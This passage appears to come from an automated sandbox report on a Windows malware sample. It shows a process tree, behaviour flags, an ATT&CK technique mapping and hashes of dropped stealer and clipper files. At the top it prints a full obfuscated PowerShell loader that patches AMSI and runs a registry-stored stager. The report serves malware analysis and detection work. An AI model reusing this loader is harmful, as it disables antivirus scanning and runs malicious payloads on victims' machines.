                                                                  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:dMLoinpylqRB{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$RxzjxzhAwGNPdA,[Parameter(Position=1)][Type]$BtdNFHsaUY)$HxvuUseEaZl=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'efle'+'c'+'t'+'e'+'d'+'D'+''+[Char](101)+''+'l'+''+'e'+''+[Char](103)+''+[Char](97)+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('In'+[Char](77)+'e'+[Char](109)+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+''+'o'+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+'M'+'y'+'D'+''+[Char](101)+'l'+'e'+''+[Char](103)+''+'a'+''+'t'+''+'e'+''+[Char](84)+''+[Char](121)+''+'p'+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+'a'+'s'+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+',Se'+'a'+''+'l'+''+'e'+''+'d'+''+[Char](44)+''+[Char](65)+'n'+[Char](115)+''+[Char](105)+''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+'u'+''+[Char](116)+''+'o'+''+[Char](67)+'l'+[Char](97)+''+'s'+''+'s'+'',[MulticastDelegate]);$HxvuUseEaZl.DefineConstructor(''+'R'+''+[Char](84)+''+'S'+'p'+'e'+''+'c'+'i'+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+'m'+''+'e'+''+[Char](44)+''+'H'+''+'i'+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+'P'+''+'u'+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$RxzjxzhAwGNPdA).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+'m'+''+[Char](101)+''+','+''+[Char](77)+''+'a'+''+'n'+''+'a'+''+[Char](103)+''+'e'+''+[Char](100)+'');$HxvuUseEaZl.DefineMethod('I'+[Char](110)+'v'+'o'+''+[Char](107)+''+[Char](101)+'',''+'P'+''+[Char](117)+''+'b'+'l'+[Char](105)+''+'c'+''+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+','+[Char](78)+''+[Char](101)+'w'+[Char](83)+''+'l'+''+'o'+''+'t'+','+[Char](86)+'i'+[Char](114)+''+'t'+''+[Char](117)+'a'+'l'+'',$BtdNFHsaUY,$RxzjxzhAwGNPdA).SetImplementationFlags('R'+'u'+''+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+'e'+''+','+''+[Char](77)+'a'+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $HxvuUseEaZl.CreateType();}$vqzKFJIBOlsTq=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('S'+'y'+''+[Char](115)+''+[Char](116)+'em'+'.'+''+[Char](100)+''+[Char](108)+'l')}).GetType('Mi'+'c'+''+[Char](114)+''+[Char](111)+''+'s'+''+[Char](111)+''+[Char](102)+''+[Char](116)+''+'.'+''+[Char](87)+'i'+[Char](110)+''+[Char](51)+''+[Char](50)+''+'.'+''+[Char](85)+''+[Char](110)+'s'+'a'+''+'f'+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](118)+''+'e'+'M'+[Char](101)+''+[Char](116)+''+[Char](104)+'o'+'d'+''+'s'+'');$pIUHayuIEtfqEG=$vqzKFJIBOlsTq.GetMethod(''+[Char](71)+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+''+[Char](111)+''+[Char](99)+'A'+'d'+''+'d'+''+'r'+'e'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+'t'+''+'i'+''+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$ZcydWahUHIrUzOGgqBa=dMLoinpylqRB @([String])([IntPtr]);$PJUwXQbreEvdLNFKaVABKj=dMLoinpylqRB @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mWmMXFJGAMN=$vqzKFJIBOlsTq.GetMethod('Ge'+[Char](116)+''+'M'+''+[Char](111)+'d'+[Char](117)+'l'+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+[Char](100)+''+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+''+[Char](114)+''+[Char](110)+''+[Char](101)+''+[Char](108)+''+'3'+''+[Char](50)+'.d'+[Char](108)+''+'l'+'')));$APLrKAgqmnijuH=$pIUHayuIEtfqEG.Invoke($Null,@([Object]$mWmMXFJGAMN,[Object](''+'L'+''+[Char](111)+''+'a'+''+'d'+''+[Char](76)+'i'+'b'+''+[Char](114)+'a'+[Char](114)+''+[Char](121)+'A')));$BPTcKddUAhyfJBhcV=$pIUHayuIEtfqEG.Invoke($Null,@([Object]$mWmMXFJGAMN,[Object](''+[Char](86)+''+[Char](105)+''+[Char](114)+''+[Char](116)+''+'u'+''+'a'+''+[Char](108)+'P'+[Char](114)+'ot'+[Char](101)+''+[Char](99)+'t')));$nAYaEzf=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($APLrKAgqmnijuH,$ZcydWahUHIrUzOGgqBa).Invoke('a'+[Char](109)+''+'s'+''+'i'+''+[Char](46)+''+[Char](100)+'l'+[Char](108)+'');$xZNhwhKoLIBHkEuSh=$pIUHayuIEtfqEG.Invoke($Null,@([Object]$nAYaEzf,[Object](''+'A'+''+'m'+'si'+[Char](83)+''+[Char](99)+'anB'+[Char](117)+'ff'+'e'+''+[Char](114)+'')));$fPjYLtlQVZ=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BPTcKddUAhyfJBhcV,$PJUwXQbreEvdLNFKaVABKj).Invoke($xZNhwhKoLIBHkEuSh,[uint32]8,4,[ref]$fPjYLtlQVZ);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$xZNhwhKoLIBHkEuSh,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($BPTcKddUAhyfJBhcV,$PJUwXQbreEvdLNFKaVABKj).Invoke($xZNhwhKoLIBHkEuSh,[uint32]8,0x20,[ref]$fPjYLtlQVZ);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+'F'+[Char](84)+''+[Char](87)+'A'+[Char](82)+''+'E'+'').GetValue(''+[Char](36)+'77sta'+'g'+''+[Char](101)+'r')).EntryPoint.Invoke($Null,$Null)"
                                                                  2⤵
                                                                  • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                  • Drops file in System32 directory
                                                                  • Suspicious use of SetThreadContext
                                                                  • Modifies data under HKEY_USERS
                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                  PID:2016
                                                                • C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  C:\Users\Admin\AppData\Local\Temp\09fd851a4f\explorha.exe
                                                                  2⤵
                                                                    PID:3732
                                                                  • C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                                                    C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                                                    2⤵
                                                                      PID:5384
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                                                                    1⤵
                                                                      PID:1168
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k netprofm -p -s netprofm
                                                                      1⤵
                                                                        PID:1252
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                                                                        1⤵
                                                                          PID:1332
                                                                        • C:\Windows\System32\svchost.exe
                                                                          C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                                                                          1⤵
                                                                            PID:1348
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                                                            1⤵
                                                                              PID:1392
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                                                                              1⤵
                                                                                PID:1404
                                                                              • C:\Windows\System32\svchost.exe
                                                                                C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                                                                1⤵
                                                                                  PID:1416
                                                                                • C:\Windows\sysmon.exe
                                                                                  C:\Windows\sysmon.exe
                                                                                  1⤵
                                                                                    PID:2648
                                                                                  • C:\Users\Admin\AppData\Local\Temp\7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe
                                                                                    "C:\Users\Admin\AppData\Local\Temp\7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da.exe"
                                                                                    1⤵
                                                                                    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
                                                                                    • Checks BIOS information in registry
                                                                                    • Identifies Wine through registry keys
                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                    • Drops file in Windows directory
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    PID:1584
                                                                                  • C:\Windows\System32\CompPkgSrv.exe
                                                                                    C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                    1⤵
                                                                                      PID:5096
                                                                                    • C:\Windows\System32\CompPkgSrv.exe
                                                                                      C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                      1⤵
                                                                                        PID:5672
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4052 -ip 4052
                                                                                        1⤵
                                                                                          PID:5680
                                                                                        • C:\Windows\System32\CompPkgSrv.exe
                                                                                          C:\Windows\System32\CompPkgSrv.exe -Embedding
                                                                                          1⤵
                                                                                            PID:6232
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 6928 -ip 6928
                                                                                            1⤵
                                                                                              PID:6248
                                                                                            • C:\Windows\system32\sihost.exe
                                                                                              sihost.exe
                                                                                              1⤵
                                                                                                PID:3704
                                                                                              • C:\Windows\system32\sihost.exe
                                                                                                sihost.exe
                                                                                                1⤵
                                                                                                  PID:1932
                                                                                                • C:\Windows\system32\sihost.exe
                                                                                                  sihost.exe
                                                                                                  1⤵
                                                                                                    PID:2748
                                                                                                  • C:\Windows\system32\sihost.exe
                                                                                                    sihost.exe
                                                                                                    1⤵
                                                                                                      PID:5956
                                                                                                    • C:\Windows\system32\sihost.exe
                                                                                                      sihost.exe
                                                                                                      1⤵
                                                                                                        PID:6152
                                                                                                      • C:\Windows\system32\sihost.exe
                                                                                                        sihost.exe
                                                                                                        1⤵
                                                                                                          PID:6772

                                                                                                        Network

                                                                                                        MITRE ATT&CK Matrix ATT&CK v13

                                                                                                        Execution

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Persistence

                                                                                                        Boot or Logon Autostart Execution

                                                                                                        1
                                                                                                        T1547

                                                                                                        Registry Run Keys / Startup Folder

                                                                                                        1
                                                                                                        T1547.001

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Privilege Escalation

                                                                                                        Boot or Logon Autostart Execution

                                                                                                        1
                                                                                                        T1547

                                                                                                        Registry Run Keys / Startup Folder

                                                                                                        1
                                                                                                        T1547.001

                                                                                                        Scheduled Task/Job

                                                                                                        1
                                                                                                        T1053

                                                                                                        Defense Evasion

                                                                                                        Virtualization/Sandbox Evasion

                                                                                                        2
                                                                                                        T1497

                                                                                                        Modify Registry

                                                                                                        2
                                                                                                        T1112

                                                                                                        Subvert Trust Controls

                                                                                                        1
                                                                                                        T1553

                                                                                                        Install Root Certificate

                                                                                                        1
                                                                                                        T1553.004

                                                                                                        Credential Access

                                                                                                        Unsecured Credentials

                                                                                                        5
                                                                                                        T1552

                                                                                                        Credentials In Files

                                                                                                        4
                                                                                                        T1552.001

                                                                                                        Credentials in Registry

                                                                                                        1
                                                                                                        T1552.002

                                                                                                        Discovery

                                                                                                        Query Registry

                                                                                                        5
                                                                                                        T1012

                                                                                                        Virtualization/Sandbox Evasion

                                                                                                        2
                                                                                                        T1497

                                                                                                        System Information Discovery

                                                                                                        3
                                                                                                        T1082

                                                                                                        Collection

                                                                                                        Data from Local System

                                                                                                        5
                                                                                                        T1005

                                                                                                        Replay Monitor

                                                                                                        Loading Replay Monitor...

                                                                                                        Downloads

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          e521eb4a4c2bbe4898150cf066ee0cb0

                                                                                                          SHA1

                                                                                                          c2b311b8b78c677b55a356b8274197fdcbae8ab5

                                                                                                          SHA256

                                                                                                          1f947cf3be3f525e3039b9c363bb7d7bc0dd2b70da434149e0f0cbbc5d13dbe3

                                                                                                          SHA512

                                                                                                          59e1b52a41dad2e7f36e0343e330b00bc33a7ba88f616928fd2b6cc526cac6effed76b006cb8a23ff45e85be27647114c7a8376ef3ba53d38ccb9ed4de9a5ea8

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
                                                                                                          Filesize

                                                                                                          152B

                                                                                                          MD5

                                                                                                          4113e45804b7888f88ae2a78482d0951

                                                                                                          SHA1

                                                                                                          4c59bba45c65ba65aa920cbd4eb0d7ccf517a220

                                                                                                          SHA256

                                                                                                          174195025b51f69ece21274cd7a97fff9f3d9a4bf57185ff3b1297bf2da6d1db

                                                                                                          SHA512

                                                                                                          16355c4c575a162396cf2ca377f586b3659a70e8c1708cad66b74bb3ef66cbf9ed33d9376730325d95420e5f4f558b2bdb6b5b7595b8b822eb6d2449a83c3f95

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
                                                                                                          Filesize

                                                                                                          5KB

                                                                                                          MD5

                                                                                                          ed39e5a4fa01d5cd1707664bae7ef3f6

                                                                                                          SHA1

                                                                                                          0d9987548a7e1ab73d8dc4e02eb6948a8b3a0d56

                                                                                                          SHA256

                                                                                                          c0c78a163c577021fc57d45b040f0aee14aafdb66d61bdd22de4b23654114343

                                                                                                          SHA512

                                                                                                          306dc502d5a7be9d872197a4b264e0e482f1fecec327cae640e20d53bc5dd0cb54c71a490f32996e446724ba1555a92da4b422ce40efd9facc4177a495f03e41

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                          Filesize

                                                                                                          11KB

                                                                                                          MD5

                                                                                                          e1f9691e91ed45eeadd79e918917abba

                                                                                                          SHA1

                                                                                                          8eb83ad69032cf04a2b543bc8abfda167b095373

                                                                                                          SHA256

                                                                                                          9dfc20748abfd5c35a552961491f56361380e18fa991b6bea049e12665b204d4

                                                                                                          SHA512

                                                                                                          26cc0dfc98b39a60be73d0861abad9a282c212b50886227fd5c006003b392fe5f2897a6a211a844f700e9dd34d8d57726093c205d838149c9e3c082523157632

                                                                                                        • C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
                                                                                                          Filesize

                                                                                                          8KB

                                                                                                          MD5

                                                                                                          5d647a1a21beadac8ea4ac6875ccafda

                                                                                                          SHA1

                                                                                                          179850d1133184ab6c46c0ae774ea98858bfc74e

                                                                                                          SHA256

                                                                                                          f5486859a0eba52ab2d9a05bbc136e151dc3e629e165e6f32e8a9d15f1514ae4

                                                                                                          SHA512

                                                                                                          32bdb80e67b28ac6db109e99a944e36c1d271c45d7ae86faedbe4148acf75b8996c79beea7ddb41e65a718330fcb9881dd9f51eef637afeb593fd146ac387a38

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\00c07260dc\explorgu.exe
                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                          MD5

                                                                                                          864674e8be395eb28bb181184add5c01

                                                                                                          SHA1

                                                                                                          79bb9c0ae54bf8572328af06b6576327bd0a386c

                                                                                                          SHA256

                                                                                                          7ef012907eb337ad94d0635a9d1a1dd64ccb32b5c193a5bb732eee3dd22013da

                                                                                                          SHA512

                                                                                                          7f85146e5cca26f5a388aeea88cf9d86819aed6e240c3b94569967a2074654327e531be66f1335f9fa0790f13844c65315a3020d0e9c6bdce40c3605164abc25

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000044001\go.exe
                                                                                                          Filesize

                                                                                                          894KB

                                                                                                          MD5

                                                                                                          2f8912af892c160c1c24c9f38a60c1ab

                                                                                                          SHA1

                                                                                                          d2deae508e262444a8f15c29ebcc7ebbe08a3fdb

                                                                                                          SHA256

                                                                                                          59ff8e0aa665fbbf749c7548906a655cb1869bb58a3b7546efa5b416d19e6308

                                                                                                          SHA512

                                                                                                          0395383bde98d358b0a7f2224f903dff026ce0c6d90feb49ac0e6993ef692143b0eb25da84d9cdc9e7b373a7b75a6dbaef14746eda1bff165d59f07ca51a16bb

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000046001\amert.exe
                                                                                                          Filesize

                                                                                                          1.8MB

                                                                                                          MD5

                                                                                                          e987c0d1f94b8822546051f3c26f5642

                                                                                                          SHA1

                                                                                                          1e794dfe9466635fecbe6d56ae101ec78574612b

                                                                                                          SHA256

                                                                                                          554dd18b0e628c29403b6347705302cc346656bc26ae31d9cf811ea09534c3e6

                                                                                                          SHA512

                                                                                                          a80bb8a7890a7de141fa33bf200f097c6e6e3cf307fa34d73c37c5b9a3508e5dbd06dc289ebd5f0ed74368f2c80c0ed2e8b0d56797e89055bb3cca815d320e86

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000873001\random.exe
                                                                                                          Filesize

                                                                                                          3.0MB

                                                                                                          MD5

                                                                                                          eb7de560bf4235d6726be4f9bf79d237

                                                                                                          SHA1

                                                                                                          e3040ce9afdd5f138bc386e3b5a155d0d36b040d

                                                                                                          SHA256

                                                                                                          49005f855f20cd3ed6d7b142af30f8eb229ab93ffe4e9740f8615bf5f148ee84

                                                                                                          SHA512

                                                                                                          9268f92fb31d9c1cb3976c0eb7211fafabe4e215d806cb42ea56ca0a4cee48ce8cd086886604f62fdc1404b5e051e41cb7c2bb99b3037197eb3f2bfbb79ff513

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1000985001\alex1234.exe
                                                                                                          Filesize

                                                                                                          1.7MB

                                                                                                          MD5

                                                                                                          85a15f080b09acace350ab30460c8996

                                                                                                          SHA1

                                                                                                          3fc515e60e4cfa5b3321f04a96c7fb463e4b9d02

                                                                                                          SHA256

                                                                                                          3a2006bc835a8ffe91b9ee9206f630b3172f42e090f4e8d90be620e540f5ef6b

                                                                                                          SHA512

                                                                                                          ade5e3531dfa1a01e6c2a69deb2962cbf619e766da3d6e8e3453f70ff55ccbcbe21381c7b97a53d67e1ca88975f4409b1a42a759e18f806171d29e4c3f250e9f

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001031001\amadka.exe
                                                                                                          Filesize

                                                                                                          1.9MB

                                                                                                          MD5

                                                                                                          c4414cc9ec67035a4edb2f20cc56fcdd

                                                                                                          SHA1

                                                                                                          3b48efb50dcb74a1f3a71498d8b33aa802a85c3f

                                                                                                          SHA256

                                                                                                          fab6f5c11615b7b2814ab9e02d105f196c0781e19b5f67dc716b1f0f5cf0f141

                                                                                                          SHA512

                                                                                                          2b1e9d21a0c7788e4d2b83c82163414ef38ec91ec9401a175623056c16779448380bebc5da7d3325775147ed05eb3cfa4b3005d63267111618c5eab5377ba909

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001039001\redlinepanel.exe
                                                                                                          Filesize

                                                                                                          301KB

                                                                                                          MD5

                                                                                                          832eb4dc3ed8ceb9a1735bd0c7acaf1b

                                                                                                          SHA1

                                                                                                          b622a406927fbb8f6cd5081bd4455fb831948fca

                                                                                                          SHA256

                                                                                                          2a82243697e2eec45bedc754adcdc1f6f41724a40c6d7d96fd41ad144899b6f7

                                                                                                          SHA512

                                                                                                          3ab8b25732a7152608be101a3daf0d55833c554ab968be8b3b79a49e1831f3ee0eeeb9586a3334fa387b1f160fd15e98a80dcfece559c9c257b44ef962874894

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001040001\32456.exe
                                                                                                          Filesize

                                                                                                          499KB

                                                                                                          MD5

                                                                                                          83d0b41c7a3a0d29a268b49a313c5de5

                                                                                                          SHA1

                                                                                                          46f3251c771b67b40b1f3268caef8046174909a5

                                                                                                          SHA256

                                                                                                          09cc3364d5e1c15228822926bc65ce290c487dc3b7c0345bf265538110fa9cc9

                                                                                                          SHA512

                                                                                                          705ecc7c421338e37ed0d58c2d9fad03fb3565db422a0c9d895e75a399bf5f2a70cfe3ffdc860ffe010d4d1a213e0a844aeadb89ea8e0c830a2fc8c03b7669b5

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001053001\goldprimeldlldf.exe
                                                                                                          Filesize

                                                                                                          464KB

                                                                                                          MD5

                                                                                                          c084d6f6ba40534fbfc5a64b21ef99ab

                                                                                                          SHA1

                                                                                                          0b4a17da83c0a8abbc8fab321931d5447b32b720

                                                                                                          SHA256

                                                                                                          afd83290a2adb219c3f1b8fbf23c27b0994fe76dfbb7dc0b416530dc0e21f624

                                                                                                          SHA512

                                                                                                          a5384a2f7029cf946fde44e1ff30775754ce525ca5a6fdac14184872b6e684cb6e585053cb86d32f82cbd3db48eb195ba3a642d8ee3774be579fccd993938ca1

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001059001\NewB.exe
                                                                                                          Filesize

                                                                                                          418KB

                                                                                                          MD5

                                                                                                          0099a99f5ffb3c3ae78af0084136fab3

                                                                                                          SHA1

                                                                                                          0205a065728a9ec1133e8a372b1e3864df776e8c

                                                                                                          SHA256

                                                                                                          919ae827ff59fcbe3dbaea9e62855a4d27690818189f696cfb5916a88c823226

                                                                                                          SHA512

                                                                                                          5ac4f3265c7dd7d172284fb28c94f8fc6428c27853e70989f4ec4208f9897be91720e8eee1906d8e843ab05798f3279a12492a32e8a118f5621ac5e1be2031b6

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001061001\Second2.exe
                                                                                                          Filesize

                                                                                                          4.6MB

                                                                                                          MD5

                                                                                                          0c2d303852f827c4852bf46550ea2ed8

                                                                                                          SHA1

                                                                                                          7bb54cb67135bbb94d8a26356f3d1e170a71a1a7

                                                                                                          SHA256

                                                                                                          194234e48c362f1bf3be6d02c5b380bfc900a2cf7911a1fc658a5a2ec0d0164f

                                                                                                          SHA512

                                                                                                          c2ab4c4a4bcfd4f9f350e946a08a9be3ded6741ac3981a977c52331a403488b4f224c7f0b01d24af3e351e532b3c3cdeedfe356785e5858411c80793fb3ca307

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001063001\Tcgprylsch.exe
                                                                                                          Filesize

                                                                                                          2.4MB

                                                                                                          MD5

                                                                                                          69c9404e02e3d62bf925fb6f3e904393

                                                                                                          SHA1

                                                                                                          d9e1c766d54244ed5ad97bed3055ccecbd7e08fd

                                                                                                          SHA256

                                                                                                          6ee5b0595ce9ca29e97c2029236b7df8e4161cd1015954cc9a2c15760c88806c

                                                                                                          SHA512

                                                                                                          209975e9cfe82e3aa0d02410936633eb95682fbf5d31cb8947361fbabcbfad8341fc0888989d5585be86d6a54d55d1c3d57b05cde71014860cf815118ab90e89

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\1001065001\koooooo.exe
                                                                                                          Filesize

                                                                                                          379KB

                                                                                                          MD5

                                                                                                          90f41880d631e243cec086557cb74d63

                                                                                                          SHA1

                                                                                                          cb385e4172cc227ba72baf29ca1c4411fa99a26d

                                                                                                          SHA256

                                                                                                          23b62a27e3f5c424b16f31e5009af4f24c8bd13b1f035f87879e2a29236be7a0

                                                                                                          SHA512

                                                                                                          eeb85b34aa66a7e9a1b1807012999ee439433df23126a52ffa8d4b3cb2026be3bcf63ca25f143de58ba929c0d4feeaf2a603fd6ec6b5379fc48147c22f3783e3

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\TmpEA12.tmp
                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          1420d30f964eac2c85b2ccfe968eebce

                                                                                                          SHA1

                                                                                                          bdf9a6876578a3e38079c4f8cf5d6c79687ad750

                                                                                                          SHA256

                                                                                                          f3327793e3fd1f3f9a93f58d033ed89ce832443e2695beca9f2b04adba049ed9

                                                                                                          SHA512

                                                                                                          6fcb6ce148e1e246d6805502d4914595957061946751656567a5013d96033dd1769a22a87c45821e7542cde533450e41182cee898cd2ccf911c91bc4822371a8

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_aef1y4lm.u3l.ps1
                                                                                                          Filesize

                                                                                                          60B

                                                                                                          MD5

                                                                                                          d17fe0a3f47be24a6453e9ef58c94641

                                                                                                          SHA1

                                                                                                          6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                          SHA256

                                                                                                          96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                          SHA512

                                                                                                          5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmp3FE4.tmp
                                                                                                          Filesize

                                                                                                          46KB

                                                                                                          MD5

                                                                                                          02d2c46697e3714e49f46b680b9a6b83

                                                                                                          SHA1

                                                                                                          84f98b56d49f01e9b6b76a4e21accf64fd319140

                                                                                                          SHA256

                                                                                                          522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

                                                                                                          SHA512

                                                                                                          60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

                                                                                                        • C:\Users\Admin\AppData\Local\Temp\tmp44D9.tmp
                                                                                                          Filesize

                                                                                                          46KB

                                                                                                          MD5

                                                                                                          14ccc9293153deacbb9a20ee8f6ff1b7

                                                                                                          SHA1

                                                                                                          46b4d7b004ff4f1f40ad9f107fe7c7e3abc9a9f3

                                                                                                          SHA256

                                                                                                          3195ce0f7aa2eae2b21c447f264e2bd4e1dc5208353ac72d964a750de9a83511

                                                                                                          SHA512

                                                                                                          916f2178be05dc329461d2739271972238b22052b5935883da31e6c98d2697bd2435c9f6a2d1fcafb4811a1d867c761055532669aac2ea1a3a78c346cdeba765

                                                                                                        • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll
                                                                                                          Filesize

                                                                                                          109KB

                                                                                                          MD5

                                                                                                          2afdbe3b99a4736083066a13e4b5d11a

                                                                                                          SHA1

                                                                                                          4d4856cf02b3123ac16e63d4a448cdbcb1633546

                                                                                                          SHA256

                                                                                                          8d31b39170909595b518b1a03e9ec950540fabd545ed14817cac5c84b91599ee

                                                                                                          SHA512

                                                                                                          d89b3c46854153e60e3fa825b394344eee33936d7dbf186af9d95c9adae54428609e3bf21a18d38fce3d96f3e0b8e4e0ed25cb5004fbe288de3aef3a85b1d93f

                                                                                                        • C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll
                                                                                                          Filesize

                                                                                                          1.2MB

                                                                                                          MD5

                                                                                                          92fbdfccf6a63acef2743631d16652a7

                                                                                                          SHA1

                                                                                                          971968b1378dd89d59d7f84bf92f16fc68664506

                                                                                                          SHA256

                                                                                                          b4588feacc183cd5a089f9bb950827b75df04bd5a6e67c95ff258e4a34aa0d72

                                                                                                          SHA512

                                                                                                          b8ea216d4a59d8858fd4128abb555f8dcf3acca9138e663b488f09dc5200db6dc11ecc235a355e801145bbbb44d7beac6147949d75d78b32fe9cfd2fa200d117

                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-1233663403-1277323514-675434005-1000\76b53b3ec448f7ccdda2063b15d2bfc3_51f76018-0820-469a-b12d-f27f55f8b028
                                                                                                          Filesize

                                                                                                          2KB

                                                                                                          MD5

                                                                                                          63a56549b56bf738ac261ca2f0eaa915

                                                                                                          SHA1

                                                                                                          81d5eb5a89c8b9b6244369e9a962a9055bf21feb

                                                                                                          SHA256

                                                                                                          030e13f03defd991dccbd497566307fec91349b628cf5060f24fc67e8359b3d8

                                                                                                          SHA512

                                                                                                          02d0d80a68aa64cd9a005166f3b182343710a8efec807da0b7cc4fa977033bc888eba2114dc315694c2b183abb03caddbb9e879a678cf2f2150d2a68271b9dc9

                                                                                                        • C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll
                                                                                                          Filesize

                                                                                                          109KB

                                                                                                          MD5

                                                                                                          726cd06231883a159ec1ce28dd538699

                                                                                                          SHA1

                                                                                                          404897e6a133d255ad5a9c26ac6414d7134285a2

                                                                                                          SHA256

